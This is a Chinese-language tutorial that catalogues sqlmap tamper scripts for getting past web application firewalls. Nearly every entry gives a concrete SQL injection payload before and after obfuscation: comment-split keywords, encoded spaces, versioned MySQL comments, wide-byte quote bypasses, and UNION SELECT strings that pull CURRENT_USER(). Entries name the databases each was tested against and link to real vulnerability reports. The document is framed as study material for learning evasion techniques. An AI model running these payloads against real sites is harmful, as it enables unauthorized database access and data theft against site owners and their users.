使用sqlmap中tamper指令碼繞過waf
0x00 背景
sqlmap中的tamper指令碼來對目標進行更高效的攻擊。
由於烏雲知識庫少了sqlmap-tamper 收集一下,方便學習。 根據sqlmap中的tamper指令碼可以學習過繞過一些技巧。 我收集在找相關的案例作為可分析什麼環境使用什麼tamper指令碼。 小學生畢業的我,著能偷偷說一下多做一些收集對吸收知識很快。
0x01 start
指令碼名:apostrophemask.py
作用:用utf8代替引號
#!sql
Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
Tested against: all
指令碼名:equaltolike.py
作用:like 代替等號
#!sql
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
案例一: http://wooyun.org/bugs/wooyun-2010-087296
案例二: http://wooyun.org/bugs/wooyun-2010-074790
案例三:http://wooyun.org/bugs/wooyun-2010-072489
指令碼名:space2dash.py
作用:繞過過濾‘=’ 替換空格字元(”),(’ – ‘)後跟一個破折號註釋,一個隨機字串和一個新行(’ n’)
#!sql
Example: ('1 AND 9227=9227') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
Tested against: * MSSQL * SQLite
案例一:http://wooyun.org/bugs/wooyun-2010-062878
指令碼名:greatest.py
作用:繞過過濾’>’ ,用GREATEST替換大於號。
#!sql
Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
指令碼名:space2hash.py
作用:空格替換為#號 隨機字串 以及換行符
#!sql
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
MySQL Tested against:
MySQL 4.0, 5.0
參考:法克的一篇文章
指令碼名:apostrophenullencode.py
作用:繞過過濾雙引號,替換字元和雙引號。
#!sql
Example: tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
Tested against:
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
指令碼名:halfversionedmorekeywords.py
作用:當資料庫為mysql時繞過防火牆,每個關鍵字之前新增mysql版本評論
#!sql
Example:
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
Requirement:
- MySQL < 5.1
Tested against:
- MySQL 4.0.18, 5.0.22
指令碼名:space2morehash.py
作用:空格替換為 #號 以及更多隨機字串 換行符
#!sql
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement: * MySQL >= 5.1.13 Tested
against: * MySQL 5.1.41
案例一:91ri一篇文章
指令碼名:appendnullbyte.py
作用:在有效負荷結束位置載入零位元組字元編碼
#!sql
Example: ('1 AND 1=1') '1 AND 1=1%00'
Requirement:
- Microsoft Access
指令碼名:ifnull2ifisnull.py
作用:繞過對 IFNULL 過濾。 替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’
#!sql
Example:
('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)'
Requirement:
MySQL
SQLite (possibly)
SAP MaxDB (possibly)
Tested against:
- MySQL 5.0 and 5.5
指令碼名:space2mssqlblank.py(mssql)
作用:空格替換為其它空符號
Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers
Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005
ASCII table:
案例一: wooyun.org/bugs/wooyun-2010-062878
指令碼名:base64encode.py
作用:用base64編碼替換 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
案例一: http://wooyun.org/bugs/wooyun-2010-060071
案例二: http://wooyun.org/bugs/wooyun-2010-021062
案例三: http://wooyun.org/bugs/wooyun-2010-043229
指令碼名:space2mssqlhash.py
作用:替換空格
#!sql
Example: ('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227' Requirement: * MSSQL * MySQL
指令碼名:modsecurityversioned.py
作用:過濾空格,包含完整的查詢版本註釋
#!sql
Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'
Requirement: * MySQL
Tested against:
- MySQL 5.0
指令碼名:space2mysqlblank.py
作用:空格替換其它空白符號(mysql)
#!sql
Example:
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users
Requirement:
- MySQL
Tested against:
- MySQL 5.1
案例一:wooyun.org/bugs/wooyun-2010-076735
指令碼名:between.py
作用:用between替換大於號(>)
#!sql
Example: ('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
案例一:wooyun.org/bugs/wooyun-2010-068815
指令碼名:space2mysqldash.py
作用:替換空格字元(”)(’ – ‘)後跟一個破折號註釋一個新行(’ n’)
注:之前有個mssql的 這個是mysql的
#!sql
Example: ('1 AND 9227=9227') '1--%0AAND--%0A9227=9227'
Requirement:
MySQL
MSSQL
指令碼名:multiplespaces.py
作用:圍繞SQL關鍵字新增多個空格
#!sql
Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'
Tested against: all
案例一: wooyun.org/bugs/wooyun-2010-072489
指令碼名:space2plus.py
作用:用+替換空格
#!sql
Example: ('SELECT id FROM users') 'SELECT+id+FROM+users' Tested against: all
指令碼名:bluecoat.py
作用:代替空格字元後與一個有效的隨機空白字元的SQL語句。 然後替換=為like
#!sql
Example: ('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1'
Tested against:
- MySQL 5.1, SGOS
指令碼名:nonrecursivereplacement.py
雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
#!sql
Example: ('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--' Tested against: all
指令碼名:space2randomblank.py
作用:代替空格字元(“”)從一個隨機的空白字元可選字元的有效集
#!sql
Example: ('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
Tested against: all
指令碼名:sp_password.py
作用:追加sp_password’從DBMS日誌的自動模糊處理的有效載荷的末尾
#!sql
Example: ('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp\_password' Requirement: * MSSQL
指令碼名:chardoubleencode.py
作用: 雙url編碼(不處理以編碼的)
#!sql
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
指令碼名:unionalltounion.py
作用:替換UNION ALL SELECT UNION SELECT
Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'
Requirement: all
指令碼名:charencode.py
作用:url編碼
#!sql
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
指令碼名:randomcase.py
作用:隨機大小寫 Example:
- Input: INSERT
- Output: InsERt
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
指令碼名:unmagicquotes.py
作用:寬字元繞過 GPC addslashes
#!sql
Example:
* Input: 1′ AND 1=1
* Output: 1%bf%27 AND 1=1–%20
指令碼名:randomcomments.py
作用:用/**/分割sql關鍵字
#!sql
Example:
‘INSERT’ becomes ‘IN//S//ERT’
指令碼名:charunicodeencode.py
作用:字串 unicode 編碼
#!sql
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
Requirement:
ASP
ASP.NET
Tested against:
Microsoft SQL Server 2000
Microsoft SQL Server 2005
MySQL 5.1.56
PostgreSQL 9.0.3
案例一: wooyun.org/bugs/wooyun-2010-074261
指令碼名:securesphere.py
作用:追加特製的字串
#!sql
Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
Tested against: all
指令碼名:versionedmorekeywords.py
作用:註釋繞過
#!sql
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement:
- MySQL >= 5.1.13
指令碼名:space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/**/’
#!sql
Example:
* Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
案例一:wooyun.org/bugs/wooyun-2010-046496
指令碼名:halfversionedmorekeywords.py
作用:關鍵字前加註釋
#!sql
Example:
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
Requirement:
- MySQL < 5.1
Tested against:
- MySQL 4.0.18, 5.0.22
收集於: http://www.91ri.org/7852.html http://www.91ri.org/7869.html http://www.91ri.org/7860.html
相關文章
- sqlmap常用繞過指令碼2020-10-20SQL指令碼
- WAF繞過之道2018-07-30
- waf 繞過的技巧2020-08-19
- Sql注入之WAF繞過2024-06-21SQL
- 第五章-WAF 繞過2024-04-06
- Waf功能、分類與繞過2020-11-15
- sql注入waf繞過簡單入門2019-03-27SQL
- 在一次滲透中學會編寫Tamper指令碼2024-05-22指令碼
- 深入瞭解SQL隱碼攻擊繞過waf和過濾機制2020-08-19SQL
- sql注入之堆疊注入及waf繞過注入2021-08-03SQL
- 檔案上傳之WAF繞過及相安全防護2021-08-12
- 360護心鏡指令碼分析及N種繞過方式2020-08-19指令碼
- 一次簡單的SQL隱碼攻擊繞WAF2021-10-18SQL
- 要想用活Redis,Lua指令碼是繞不過去的坎2021-02-08Redis指令碼
- 24:WEB漏洞-檔案上傳之WAF繞過及安全修復2021-12-02Web
- powershell程式碼混淆繞過2020-06-21
- sqlmap的使用2018-07-24SQL
- Sqlmap使用教程2019-07-01SQL
- 使用HTTP頭進行403繞過 速率繞過 Rate Limit Bypass2024-10-27HTTPMIT
- struts2繞過waf讀寫檔案及另類方式執行命令2022-04-18
- js繞過-前端加密繞過2021-08-12JS前端加密
- SQLMAP進階使用2020-08-19SQL
- sqlmap使用,配合Burpsuite2024-07-08SQLUI
- sqlmap使用手冊2022-03-04SQL
- Bash從GoogleDrive下載大檔案時繞過病毒驗證頁面的指令碼2024-12-11Go指令碼
- 通過shell指令碼 批量新增使用者2019-12-09指令碼
- 過WAF的小思路2021-09-03
- sqlmap原始碼通讀(一)2019-07-18SQL原始碼
- sqlmap原始碼通讀(二)2019-07-18SQL原始碼
- sqli-labs————寬位元組注入(可以用於繞過濾了單引號或者\的WAF)2018-05-19SQL
- sqlmap簡單使用方法2024-04-22SQL
- sqlmap使用者手冊2020-08-19SQL
- redis中lua指令碼的簡單使用2021-10-27Redis指令碼
- 利用CMSTP繞過AppLocker並執行程式碼2018-05-23APP行程
- xss-程式碼角度理解與繞過filter2021-06-05Filter
- sqlmap使用者手冊[續]2020-08-19SQL
- 關於sqlmap中--os-shell如何getshell的原始碼分析2024-11-23SQL原始碼
- 中轉Webshell繞過流量檢測防護2024-03-08Webshell